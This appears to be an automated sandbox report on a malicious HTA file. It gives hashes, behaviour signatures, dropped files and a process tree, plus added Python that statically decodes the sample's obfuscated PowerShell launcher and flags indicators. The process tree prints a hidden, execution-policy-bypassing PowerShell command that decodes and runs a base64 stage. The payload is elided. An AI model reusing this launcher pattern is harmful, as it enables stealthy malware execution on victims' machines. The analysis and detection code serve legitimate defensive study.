Analysis

  • max time kernel
    120s
  • max time network
    122s
  • platform
    windows7_x64
  • resource
    win7-20240903-en
  • resource tags

    arch:x64 arch:x86 image:win7-20240903-en locale:en-us os:windows7-x64 system
  • submitted
    14-11-2024 02:28

General

  • Target

    5b6f4c78a2cd6af5d7ce1d063d2f5c6136a6c4fa3a7637dabb36358043c33546.hta

  • Size

    207KB

  • MD5

    fcd22700962f05502dfd476b9fd35c11

  • SHA1

    f338e2af10c4e6e35d7f8f6e3613516150aeea71

  • SHA256

    5b6f4c78a2cd6af5d7ce1d063d2f5c6136a6c4fa3a7637dabb36358043c33546

  • SHA512

    8a2ff6c978fcb10971638458887c0794d42ac8c3cd3ad5f56644dc639d4a8bfaf6bc1bb70c23006184ef285e545dbaa5b90621a6669dc58681af62a9b0a6dc19

  • SSDEEP

    96:43F97f45Ln2rlmc265Ln2glmccBaPrKwPjTQxZ5LnI5LnCiFlmcW65Ln2OQ:43F1f8wlz2yflzRgrsCiFlzWybQ

Malware Config

Signatures

  • Blocklisted process makes network request 2 IoCs
  • Evasion via Device Credential Deployment 2 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 5 IoCs

    Attempts to gather information about the system language of the victim in order to infer the geographical location of that host.

  • Modifies Internet Explorer settings 1 TTPs 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of WriteProcessMemory 16 IoCs

Processes

  • C:\Windows\SysWOW64\mshta.exe
    C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\5b6f4c78a2cd6af5d7ce1d063d2f5c6136a6c4fa3a7637dabb36358043c33546.hta"
    1⤵
    • System Location Discovery: System Language Discovery
    • Modifies Internet Explorer settings
    • Suspicious use of WriteProcessMemory
    PID:2516
    • C:\Windows\SysWOW64\wiNdoWSPoWeRSheLl\v1.0\POwersHeLl.ExE
      "C:\Windows\SysTEM32\wiNdoWSPoWeRSheLl\v1.0\POwersHeLl.ExE" "pOwErsHell -Ex ByPass -NoP -w 1 -C DEVicecREdEnTiAlDEplOYMeNt ; iex($(Iex('[sYStEM.tExt.EnCodINg]'+[ChaR]58+[CHAr]0X3a+'UTF8.getsTring([SYsTEm.CoNVErT]'+[ChAr]0x3a+[CHAR]58+'FroMBASe64strINg('+[ChaR]0X22+'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'+[chaR]0X22+'))')))"
      2⤵
      • Blocklisted process makes network request
      • Evasion via Device Credential Deployment
      • System Location Discovery: System Language Discovery
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:1688
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex ByPass -NoP -w 1 -C DEVicecREdEnTiAlDEplOYMeNt
        3⤵
        • Evasion via Device Credential Deployment
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:2804
      • C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
        "C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\izdu6utb.cmdline"
        3⤵
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:2872
        • C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
          C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESAD22.tmp" "c:\Users\Admin\AppData\Local\Temp\CSCAD21.tmp"
          4⤵
          • System Location Discovery: System Language Discovery
          PID:2860
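The PowerShell command line at depth 2 above assembles its next stage from single-quoted fragments glued together with `[ChaR]58` / `[CHAr]0X3a` casts (both are `:`, so the pair spells `::`) and `[chaR]0X22` (a double quote), then hands the result to `Iex`, which evaluates `[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String("..."))`, and a second `iex` runs the decoded text. The mixed case defeats naive string matching; the string can still be recovered statically without ever running PowerShell. The Python below is an added example and is not part of this report or of the sandbox; the function names `fold_concat`, `extract_stage` and `indicators` are its own. Because the base64 payload in the report is elided, the sample command line is constructed from the wrapper visible in the process tree around a harmless, made-up second stage.

```python
import base64
import re

# One token of the concatenation: a single-quoted PowerShell literal ('' escapes a quote)
# or a [char]N cast with N in decimal or 0x-hex. Only this subset is folded; everything
# else on the command line (iex, $(...), operators) is skipped, never executed.
TOKEN_RE = re.compile(r"'((?:[^']|'')*)'|\[char\]\s*(0x[0-9a-f]+|\d+)", re.IGNORECASE)


def fold_concat(expr: str) -> str:
    """Statically fold 'literal' + [char]N + 'literal' ... into the string it builds."""
    pieces = []
    for m in TOKEN_RE.finditer(expr):
        if m.group(1) is not None:
            pieces.append(m.group(1).replace("''", "'"))
        else:
            code = m.group(2)
            pieces.append(chr(int(code, 16) if code.lower().startswith("0x") else int(code)))
    return "".join(pieces)


# After folding, the double quotes come from chr(0x22), so a literal " surrounds the payload.
B64_CALL_RE = re.compile(r'FromBase64String\("([A-Za-z0-9+/=]+)"\)', re.IGNORECASE)


def extract_stage(cmdline: str) -> dict:
    """Recover the next-stage script from the wrapper pattern seen in this report."""
    folded = fold_concat(cmdline)
    m = B64_CALL_RE.search(folded)
    if not m:
        raise ValueError("no FromBase64String(...) call found after folding")
    next_stage = base64.b64decode(m.group(1)).decode("utf-8")
    return {"folded": folded, "next_stage": next_stage}


# Command-line indicators a detection rule would key on; all case-insensitive because the
# sample case-mangles every token. Prefix forms (-w, -Ex, -NoP) are accepted by PowerShell.
INDICATORS = {
    "hidden_window": re.compile(r"-w[a-z]*\s+(?:1|h[a-z]*)\b", re.IGNORECASE),
    "execpolicy_bypass": re.compile(r"-e[a-z]*\s+bypass\b", re.IGNORECASE),
    "no_profile": re.compile(r"-nop[a-z]*\b", re.IGNORECASE),
    "invoke_expression": re.compile(r"\b(?:iex|invoke-expression)\b", re.IGNORECASE),
    "base64_decode": re.compile(r"frombase64string", re.IGNORECASE),
    "char_cast_concat": re.compile(r"\[char\]\s*(?:0x[0-9a-f]+|\d+)", re.IGNORECASE),
    "device_credential_deployment": re.compile(r"devicecredentialdeployment", re.IGNORECASE),
}


def indicators(cmdline: str) -> list:
    """Names of the indicators present on a command line, sorted for stable comparison."""
    return sorted(name for name, rx in INDICATORS.items() if rx.search(cmdline))


# Constructed sample: the report's wrapper around a benign made-up second stage. The real
# payload is elided in the report, so it is re-encoded here rather than copied.
SAMPLE_STAGE2 = "Write-Output 'constructed second stage'"
SAMPLE_B64 = base64.b64encode(SAMPLE_STAGE2.encode("utf-8")).decode("ascii")
SAMPLE_CMDLINE = (
    "pOwErsHell -Ex ByPass -NoP -w 1 -C DEVicecREdEnTiAlDEplOYMeNt ; "
    "iex($(Iex('[sYStEM.tExt.EnCodINg]'+[ChaR]58+[CHAr]0X3a+'UTF8.getsTring([SYsTEm.CoNVErT]'"
    "+[ChAr]0x3a+[CHAR]58+'FroMBASe64strINg('+[ChaR]0X22+'" + SAMPLE_B64 + "'+[chaR]0X22+'))')))"
)

if __name__ == "__main__":
    result = extract_stage(SAMPLE_CMDLINE)
    print("folded :", result["folded"])
    print("stage 2:", result["next_stage"])
    print("flags  :", ", ".join(indicators(SAMPLE_CMDLINE)))
```

Running the module on the sample prints the reassembled `[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String("..."))` call and the decoded second stage. On a real capture, feed the full command line from the sandbox or EDR event into `extract_stage`; the decoded text is what the outer `iex` would execute and is the artifact to analyse next.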

Network

MITRE ATT&CK Enterprise v15

Downloads

  • C:\Users\Admin\AppData\Local\Temp\RESAD22.tmp

    Filesize

    1KB

    MD5

    78ba4ba9e5cd4d1450123b290bb33f7b

    SHA1

    a345efa2b3a9a661451bdcd73fa957216475a0d9

    SHA256

    a95e272886f38db936882deb9994674cc2a43a07d8a80bb92012fa916e36fd77

    SHA512

    5741f1538d57a7399f053e387974fcbbfe4ce2f2854659dd9164cc610f07791678233c304751bb7bc3ffa46b1e4d607469e5943d837ddcac2a9b2f50dbf659e0

  • C:\Users\Admin\AppData\Local\Temp\izdu6utb.dll

    Filesize

    3KB

    MD5

    3218f868f336ca301438aeb48e571988

    SHA1

    55c770ae3601d5c090fef1d74f3bc8fade78d343

    SHA256

    227bcaafdd1ee0187da1546b91d8fcfbd30ec783757c5121d98c2455e0001fcc

    SHA512

    00155c6ba172374c16ca5d05b3e9b082c91f3a8f264bcef8b90c21f20a837caf77a545de4cd3605d723f8a647b901b0959818ce846eb4f64d587bce326b37d0c

  • C:\Users\Admin\AppData\Local\Temp\izdu6utb.pdb

    Filesize

    7KB

    MD5

    943f5fe78cba3be93ead28a8da5ba683

    SHA1

    a3cf7fe11d10fee595d7ebf1f5648ee18db07c7b

    SHA256

    b95ff72fb9f74ee921d909d6152b9b3cdce12b4d4b460c90af4ca7b644dbbaa9

    SHA512

    fc907e54b6c4ce0a25219fc29e6e3f8ce3c2a1ef119d646762523f591b1203a411ea2de46d9f00827169fe7a09fad176618831a9dc04fc8546fccdef84935a7f

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

    Filesize

    7KB

    MD5

    0e0ce348f6ba941e618f1f455f29bea6

    SHA1

    9ba4c3c056c3e0c5997fd8eda7812d1b1a353324

    SHA256

    06242b3b804c45f717ffc02587d79a5cb14a98cb8baa625601f31fdaab3c1b35

    SHA512

    2af0e2e84d46fda69b4fb3bafebff13473f15199c943f1d93f9c08f901af18cb03f44e0f1f7b4f333d465e6e000b5fc4134d5a29e58fe671be5ad9451f4c27b0

  • \??\c:\Users\Admin\AppData\Local\Temp\CSCAD21.tmp

    Filesize

    652B

    MD5

    a39953edc790fd3c055982264d45ebd9

    SHA1

    030b6c5c9f542e7a2c11e31e6f6cd192fe625d28

    SHA256

    73e60fa13a32189fc6acb4f43438c43bea75ab6c954610c83a0e03adb8f5498b

    SHA512

    21f55a0a46f8326aaba23334a6693dd0bea8547156fdab2b350958d670d00b47ab8a834f1beef1aece6b4eab761032efab633ded776481f038cb8cde29f9192d

  • \??\c:\Users\Admin\AppData\Local\Temp\izdu6utb.0.cs

    Filesize

    473B

    MD5

    4af98cbe7b888e1e92e1aa8a35732223

    SHA1

    75d54c91355c97fc9b1c3453efea5dccd817ed42

    SHA256

    596b94a3cb934e9261ddf50733d26c0147c5cb57e1215cabed32fee719782f34

    SHA512

    1127001fd6eb53db939188df14cdd466f44103d8386e51ffaeaaa56569e137367388097c37422fbe332f6b7ced9f4959058f1235f106efcc03e492e009705ff3

  • \??\c:\Users\Admin\AppData\Local\Temp\izdu6utb.cmdline

    Filesize

    309B

    MD5

    39436a3ec2a28845767ca16383e33bd1

    SHA1

    5003dd9e8157d5f18e1610fcfb89da7f0e5b6b27

    SHA256

    805a6e724b1d941e225b313dfaec1a58cf13ede9db57896dc4acfefca1731992

    SHA512

    eff698496ff9504ddff80e7d87415ae24cf3d3888165f5bf01aa0390285db7f84450dd55a833d0ae04b3d686b04578eb340cd23da5e3931d297ddda775be7097